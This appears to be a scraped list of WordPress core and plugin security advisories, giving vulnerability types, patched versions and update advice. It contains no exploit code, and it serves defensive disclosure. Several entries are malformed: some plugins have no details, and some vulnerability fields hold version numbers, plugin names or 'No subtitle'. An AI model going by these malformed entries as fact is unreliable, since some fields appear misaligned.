Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: WordPress Language

Plugin: MainWP Google Analytics Extension

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: Auto Amazon Links – Amazon Associates Affiliate Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via style
Patched Version: 5.3.2
Recommended Action: Update to version 5.3.2, or a newer patched version

Plugin: 3xSocializer

Vulnerability: Authenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cryptographp

Core: WordPress

Vulnerability: Spam Protection Bypass
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Debug Bar – Enable WP_DEBUG from admin dashboard

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.86
Recommended Action: Update to version 1.86, or a newer patched version

Plugin: WP SOCIAL BOOKMARK MENU

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced XML Reader

Vulnerability: External Entity Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Missing Authorization
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: eID Easy

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.7
Recommended Action: Update to version 4.7, or a newer patched version

Plugin: Booking.com Product Helper

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Simple Calendar – Google Calendar Plugin

Vulnerability: Cross-Site Request Forgery via bulk_actions
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: Data Tables Generator by Supsystic

Vulnerability: Time-Based Blind SQL Injection
Patched Version: 1.10.0
Recommended Action: Update to version 1.10.0, or a newer patched version

Plugin: N5 Upload Form

Plugin: Brafton

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: OSM – OpenStreetMap

Vulnerability: OpenStreetMap <= 6.0
Patched Version: 6.0.1
Recommended Action: Update to version 6.0.1, or a newer patched version

Plugin: External Links – nofollow, noopener & new window

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 2.56
Recommended Action: Update to version 2.56, or a newer patched version

Plugin: Login | Login Page | Login Logo | Rename Login Page | Custom Login Page | Temporary Users | Rebrand Login | Login Captcha

Vulnerability: 1.1.1
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: WP Upload Restriction

Vulnerability: No subtitle
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Share-one-Drive

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.15.3
Recommended Action: Update to version 1.15.3, or a newer patched version

Plugin: Advanced Local Pickup for WooCommerce

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Lead Generated

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 1.25
Recommended Action: Update to version 1.25, or a newer patched version

Plugin: Better RSS Widget

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery via process_deactivate_product
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: The School Management – Education & Learning Management

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: WP Activity Log

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Express Shop

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via ‘layouts’ parameter
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Divi Builder

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.17.3
Recommended Action: Update to version 2.17.3, or a newer patched version

Plugin: Appointment Booking and Scheduling Calendar Plugin – Webba Booking

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: VK Blocks

Vulnerability: Authenticated(Contributor+) Settings Update
Patched Version: 1.57.0.10
Recommended Action: Update to version 1.57.0.10, or a newer patched version

Plugin: Icons Font Loader – Load Various Web Fonts & Icons on WP

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Popup by Supsystic

Vulnerability: Prototype Pollution
Patched Version: 1.10.19
Recommended Action: Update to version 1.10.19, or a newer patched version

Plugin: Product Carousel Slider & Grid Ultimate for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Make Connector

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Laposta Signup Embed

Vulnerability: Missing Authorization
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Contact Form Builder by vcita

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.10.1
Recommended Action: Update to version 4.10.1, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Missing Authorization
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Interactive Image Map Builder

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Real3D Flipbook

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Contributor+ Stored Cross-Site Scripting via File Thumbnail
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.0.18
Recommended Action: Update to version 3.0.18, or a newer patched version

Plugin: Coru LFMember

Plugin: Contact Form for WordPress – Ultimate Form Builder Lite

Vulnerability: SQL Injection to PHP Object Injection
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: NOO Timetable

Plugin: Slide Anything – Responsive Content / HTML Slider and Carousel

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 2.4.9
Recommended Action: Update to version 2.4.9, or a newer patched version

Plugin: Mega Main Menu

Vulnerability: Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RSVPMaker

Vulnerability: Authenticated (Admin+) SQL Injection via ‘delete’ parameter
Patched Version: 9.9.4
Recommended Action: Update to version 9.9.4, or a newer patched version

Plugin: Contact Form Check Tester

Vulnerability: Authenticated (Subscriber+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LearnPress Export Import – WordPress extension for LearnPress

Vulnerability: Export/Import Courses <= 4.0.2
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: EnvíaloSimple: Email Marketing y Newsletters

Vulnerability: No subtitle
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: WP Offload SES Lite

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Download Monitor

Vulnerability: Cross-Site Scripting via p Parameter
Patched Version: 3.3.6.2
Recommended Action: Update to version 3.3.6.2, or a newer patched version

Plugin: wptf-image-gallery

Vulnerability: Arbitrary File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Server-Side Request Forgery
Patched Version: 3.7.13
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.13, 3.8.13, 3.9.11, 4.0.10, 4.1.10, 4.2.7, 4.3.3, 4.4.2

Plugin: Ptengine – Heatmap Analytics

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: WordPress Photo Gallery – Image Gallery

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPE Indoshipping

Plugin: WooPayments: Integrated WooCommerce Payments

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.5.0
Recommended Action: Update to version 6.5.0, or a newer patched version

Plugin: Salon Booking System

Vulnerability: Stored Cross-Site Scripting
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: WP CSV to Database – Insert CSV file content into WordPress database

Plugin: WordPress Gallery Plugin

Vulnerability: Unauthenticated Remote File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Related YouTube Videos

Vulnerability: Cross-site Request Forgery
Patched Version: 1.9.9
Recommended Action: Update to version 1.9.9, or a newer patched version

Plugin: API Bearer Auth

Vulnerability: Cross-Site Scripting
Patched Version: 20190907
Recommended Action: Update to version 20190907, or a newer patched version

Plugin: Very Simple Breadcrumb

Plugin: Product Vendors

Vulnerability: Authenticated (Shop manager+) SQL Injection
Patched Version: 2.1.79
Recommended Action: Update to version 2.1.79, or a newer patched version

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Missing Authorization
Patched Version: 1.0.42.2
Recommended Action: Update to version 1.0.42.2, or a newer patched version

Plugin: Podlove Podcast Publisher

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 2.3.16
Recommended Action: Update to version 2.3.16, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Directory Listing
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Theme My Login 2fa

Vulnerability: 2FA Bypass via Brute Force
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Add Posts to Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FOX – Currency Switcher Professional for WooCommerce

Vulnerability: Cross-Site Request Forgery via delete_profiles_data
Patched Version: 1.4.1.5
Recommended Action: Update to version 1.4.1.5, or a newer patched version

Plugin: WP VR – 360 Panorama and Free Virtual Tour Builder For WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.2.8
Recommended Action: Update to version 8.2.8, or a newer patched version

Plugin: intouch

Plugin: WordPress Contact Form, Drag and Drop Form Builder Plugin – Live Forms

Vulnerability: SQL Injection
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Podcasting Plugin by TSG

Vulnerability: Remote File Inclusion
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Administrator Open Redirect
Patched Version: 3.4.34
Recommended Action: Update to version 3.4.34, or a newer patched version

Plugin: Simple Photo Gallery

Plugin: WP 2FA – Two-factor authentication for WordPress

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: FooGallery – Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0.35
Recommended Action: Update to version 2.0.35, or a newer patched version

Plugin: My Site Audit

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Appointment Booking Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.25
Recommended Action: Update to version 1.2.25, or a newer patched version

Plugin: Email Artillery (MASS EMAIL)

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 1.28.0
Recommended Action: Update to version 1.28.0, or a newer patched version

Plugin: Calendar Event Multi View

Vulnerability: Insufficient Authorization
Patched Version: 1.4.15
Recommended Action: Update to version 1.4.15, or a newer patched version

Plugin: CMS Tree Page View

Vulnerability: Missing Authorization Checks
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Authenticated SQL Injection
Patched Version: 2.5.6
Recommended Action: Update to version 2.5.6, or a newer patched version

Plugin: WordPress Social Login

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: Gallery Bank – WordPress Photo Gallery Plugin

Vulnerability: SQL Injection
Patched Version: 3.0.102
Recommended Action: Update to version 3.0.102, or a newer patched version

Plugin: Enhanced Plugin Admin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.16
Recommended Action: Update to version 1.16, or a newer patched version

Plugin: wp-tmkm-amazon

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: RokIntroScroller

Vulnerability: Cross-Site Scripting
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Autocomplete Location field Contact Form 7

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: WP Private Message

Vulnerability: Insecure Direct Object Reference
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Contact Bank – Contact Form Builder for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.20
Recommended Action: Update to version 2.0.20, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘addRedirect’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Zotpress

Vulnerability: Reflected Cross-Site Scripting via ‘PHP_SELF’
Patched Version: 7.3.5
Recommended Action: Update to version 7.3.5, or a newer patched version

Plugin: School Management System – WPSchoolPress

Vulnerability: Missing Authorization
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Duplicator Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.5.11.1
Recommended Action: Update to version 4.5.11.1, or a newer patched version

Plugin: All Video Gallery Plugin for WordPress

Plugin: GD Star Rating

Plugin: vSlider Multi Image Slider for WordPress

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated (Subscriber+) Information Exposure
Patched Version: 5.12.8
Recommended Action: Update to version 5.12.8, or a newer patched version

Plugin: Participants Database

Vulnerability: SQL Injection
Patched Version: 1.5.4.9
Recommended Action: Update to version 1.5.4.9, or a newer patched version

Plugin: Happy Addons for Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.10.1
Recommended Action: Update to version 3.10.1, or a newer patched version

Plugin: Add to home screen WP Plugin

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Reflected Cross-Site Scripting via ‘data’
Patched Version: 3.6.26
Recommended Action: Update to version 3.6.26, or a newer patched version

Plugin: RD Station

Vulnerability: Cross-Site Request Forgery to Plugin Log Deletion
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Core: WordPress

Vulnerability: Missing Authorization Checks on create_post
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Google Doc Embedder

Vulnerability: SQL Injection
Patched Version: 2.5.17
Recommended Action: Update to version 2.5.17, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: Authenticated Arbitrary Plugin Deactivation and Settings Modification
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Product Category Tree

Plugin: EventON

Vulnerability: Insecure Direct Object Reference to Unauthorized Post Access
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Missing Authorization to Category Update
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Page Restrict

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: 404 Solution

Vulnerability: Authenticated (Administrator+) SQL Injection via orderby
Patched Version: 2.34.0
Recommended Action: Update to version 2.34.0, or a newer patched version

Plugin: Add to Feedly

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.32
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.32, 3.8.32, 3.9.30, 4.0.29, 4.1.29, 4.2.26, 4.3.22, 4.4.21, 4.5.20, 4.6.17, 4.7.16, 4.8.12, 4.9.13, 5.0.8, 5.1.4, 5.2.5, 5.3.1

Plugin: WPCargo Track & Trace

Vulnerability: Unauthenticated Remote Code Execution
Patched Version: 6.9.0
Recommended Action: Update to version 6.9.0, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.11.6
Recommended Action: Update to version 2.11.6, or a newer patched version

Plugin: SoundCloud Is Gold

Vulnerability: Missing Authorization to Soundcloud User Add
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Responsive Tabs

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: Simple Ajax Chat – Add a Fast, Secure Chat Box

Vulnerability: Sensitive Information Disclosure
Patched Version: 20220216
Recommended Action: Update to version 20220216, or a newer patched version

Core: WordPress

Vulnerability: Weak Multi-Site Activation Key for User and Site Signup
Patched Version: 3.7.17
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.17, 3.8.17, 3.9.15, 4.0.14, 4.1.14, 4.2.11, 4.3.7, 4.4.6, 4.5.5, 4.6.2, 4.7.1

Plugin: Floating Action Button

Vulnerability: Cross-Site Request Forgery to Settings Modification
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Extra Charges To Payment Gateway For WooCommerce (Standard)

Plugin: Userlike – WordPress Live Chat plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: SportsPress – Sports Club & League Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: Anti-Malware Security and Brute-Force Firewall

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.15.23
Recommended Action: Update to version 4.15.23, or a newer patched version

Plugin: Cross Slide

Vulnerability: Multiple Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Contact form 7 DB

Vulnerability: SQL Injection
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: User Access Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via title_html_tag
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: WooCommerce Pre-Orders

Vulnerability: Cross-Site Request Forgery to Order Cancellation
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: Missing Authorization on tptn_ajax_clearcache
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Social Login by BestWebSoft

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 0.2
Recommended Action: Update to version 0.2, or a newer patched version

Plugin: HM Multiple Roles

Vulnerability: Privilege Escalation via Arbitrary Role Change
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Uploader

Plugin: Social Sharing Toolkit

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Quasar form free – Contact Form Builder for WordPress

Vulnerability: Authenticated (Subscriber+) SQL Injection via ‘id’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PayPal Pro Add-on for iThemes Exchange

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: PDF & Print Button Joliprint

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Google Maps v3 Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Login WP

Plugin: UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WP

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.2.29
Recommended Action: Update to version 1.2.2.29, or a newer patched version

Plugin: Mail logging – WP Mail Catcher

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Missing Authorization
Patched Version: 1.8.16
Recommended Action: Update to version 1.8.16, or a newer patched version

Plugin: Email Queue by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Zendrop – Global Dropshipping

Vulnerability: SQL Injection in setMetaData
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.9
Recommended Action: Update to version 1.6.9, or a newer patched version

Plugin: WP Post Author – Boost Your Blog's Engagement with Author Box, Social Links, Co-Authors, Guest Authors, Post Rating System, and Custom User Registration Form Builder

Vulnerability: Privilege Escalation
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: Login by Auth0

Vulnerability: Insecure Direct Object Reference
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: Limit Attempts by BestWebSoft – WordPress Anti-Bot and Security Plugin for Login and Forms

Vulnerability: SQL Injection
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Smush Image Optimization – Optimize Images | Compress & Lazy Load Images | Convert WebP | Image CDN

Vulnerability: Authenticated PHAR Deserialization
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: Simple Popup Newsletter

Plugin: Custom Add User

Plugin: Contact Form 7 Database Addon – CFDB7

Vulnerability: CSV Injection
Patched Version: 1.2.6.5
Recommended Action: Update to version 1.2.6.5, or a newer patched version

Plugin: Core Tweaks WP Setup

Plugin: MailerLite – Signup forms (official)

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: CSV Injection
Patched Version: 5.9.7.2
Recommended Action: Update to version 5.9.7.2, or a newer patched version

Plugin: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp – Chaty

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: Better Font Awesome

Vulnerability: Missing Authorization to Plugin Options Update
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Multiple Page Generator Plugin – MPG

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 3.3.18
Recommended Action: Update to version 3.3.18, or a newer patched version

Plugin: HTML filter and csv-file search

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: GDPR Cookie Consent by Supsystic

Plugin: Font Awesome More Icons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: wpForo Forum

Vulnerability: Cross-Site Scripting via langid parameter
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Dokan – Powerful WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy

Vulnerability: Authenticated(Shop Manager+) PHP Object Injection via create_dummy_vendor
Patched Version: 3.7.20
Recommended Action: Update to version 3.7.20, or a newer patched version

Core: WordPress

Vulnerability: Full Path Disclosure
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Smart Floating / Sticky Buttons – Call, Sharing, Chat Widgets & More – Buttonizer

Vulnerability: Smart Floating Action Button <= 2.5.4
Patched Version: 2.5.5
Recommended Action: Update to version 2.5.5, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: BuddyPress

Vulnerability: Missing Authorization to Group Creation
Patched Version: 7.3.0
Recommended Action: Update to version 7.3.0, or a newer patched version

Plugin: Survey Maker

Vulnerability: Reflected Cross-Site Scripting via ‘page’ parameter
Patched Version: 3.4.7
Recommended Action: Update to version 3.4.7, or a newer patched version

Plugin: Dynamic Word Spinner: CSS3 Animated Rotation

Vulnerability: Cross-Site Request Forgery via save_admin_options
Patched Version: 5.5
Recommended Action: Update to version 5.5, or a newer patched version

Plugin: Genki Pre-Publish Reminder

Plugin: WIP Custom Login

Vulnerability: Cross-Site Request Forgery via save_option
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.77.3
Recommended Action: Update to version 2.0.77.3, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: Authenticated (Admin+) Arbitrary Options Update
Patched Version: 9.7.2
Recommended Action: Update to version 9.7.2, or a newer patched version

Plugin: simple-popup-images

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: GS Insever Portfolio

Plugin: Order Export & Order Import for WooCommerce

Vulnerability: Authenticated (Shop Manager+) Arbitrary File Upload via upload_import_file
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

